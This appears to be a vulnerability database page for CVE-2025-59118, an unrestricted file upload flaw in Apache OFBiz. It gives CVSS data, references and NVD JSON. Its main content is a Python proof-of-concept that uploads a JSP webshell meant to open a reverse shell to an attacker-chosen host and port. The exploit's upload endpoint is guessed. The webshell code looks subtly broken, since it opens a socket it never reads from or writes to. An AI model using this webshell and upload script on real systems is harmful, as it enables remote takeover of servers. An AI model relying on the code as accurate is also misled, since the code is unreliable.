CVE-2025-59118

Description

Unrestricted Upload of File with Dangerous Type vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.03. Users are recommended to upgrade to version 24.09.03, which fixes the issue.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* - VULNERABLE

Apache OFBiz < 24.09.03

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-59118 Apache OFBiz Unrestricted File Upload PoC
Note: This is for educational and authorized testing purposes only
"""

import requests
import sys

def exploit_ofbiz(target_url, lhost, lport):
    """
    Exploit Apache OFBiz file upload vulnerability to upload JSP webshell
    """
    
    # JSP webshell with reverse shell
    webshell = f'''
<%@ page import="java.io.*" %>
<%@ page import="java.net.*" %>
<%
String host = "{lhost}";
int port = {lport};
Socket socket = new Socket(host, port);
Process process = Runtime.getRuntime().exec("/bin/bash");
InputStream inputStream = process.getInputStream();
OutputStream outputStream = process.getOutputStream();
DataInputStream dataInputStream = new DataInputStream(inputStream);
DataOutputStream dataOutputStream = new DataOutputStream(outputStream);
while(true) {{
    String command = dataInputStream.readLine();
    if(command.equals("exit")) {{
        break;
    }}
    Process process2 = Runtime.getRuntime().exec(command);
    BufferedReader reader = new BufferedReader(new InputStreamReader(process2.getInputStream()));
    String line = "";
    while((line = reader.readLine()) != null) {{
        dataOutputStream.writeBytes(line + "\\n");
    }}
    dataOutputStream.flush();
}}
%>
'''
    
    # File upload endpoint (common OFBiz upload location)
    upload_url = f"{target_url}/webtools/control/FileUpload"
    
    # Prepare multipart form data
    files = {
        'uploadedFile': ('shell.jsp', webshell.encode(), 'application/octet-stream')
    }
    
    try:
        print(f"[*] Attempting to upload webshell to {target_url}")
        response = requests.post(upload_url, files=files, timeout=10)
        
        if response.status_code == 200:
            print("[+] File uploaded successfully!")
            print(f"[*] Access the shell at: {target_url}/images/shell.jsp")
        else:
            print(f"[-] Upload failed with status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target_url> <lhost> <lport>")
        print(f"Example: {sys.argv[0]} http://target.com:8443 192.168.1.100 4444")
        sys.exit(1)
    
    exploit_ofbiz(sys.argv[1], sys.argv[2], sys.argv[3])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59118
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59118
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59118/
[4] VulDB https://vuldb.com/cve/CVE-2025-59118
[5] https://issues.apache.org/jira/browse/OFBIZ-13292
[6] https://lists.apache.org/thread/202263kpy7g76pzsy1fm96h9lcmhsqpt
[7] https://ofbiz.apache.org/download.html
[8] https://ofbiz.apache.org/release-notes-24.09.03.html
[9] https://ofbiz.apache.org/security.html
[10] http://www.openwall.com/lists/oss-security/2025/11/11/1

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59118", "sourceIdentifier": "[email protected]", "published": "2025-11-12T10:15:43.703", "lastModified": "2025-11-13T15:04:59.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in Apache OFBiz.\n\nThis issue affects Apache OFBiz: before 24.09.03.\n\nUsers are recommended to upgrade to version 24.09.03, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.09.03", "matchCriteriaId": "C0FD636F-C69E-4284-95A0-0CD8A5DEB08F"}]}]}], "references": [{"url": "https://issues.apache.org/jira/browse/OFBIZ-13292", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://lists.apache.org/thread/202263kpy7g76pzsy1fm96h9lcmhsqpt", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "https://ofbiz.apache.org/download.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://ofbiz.apache.org/release-notes-24.09.03.html", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://ofbiz.apache.org/security.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/11/11/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}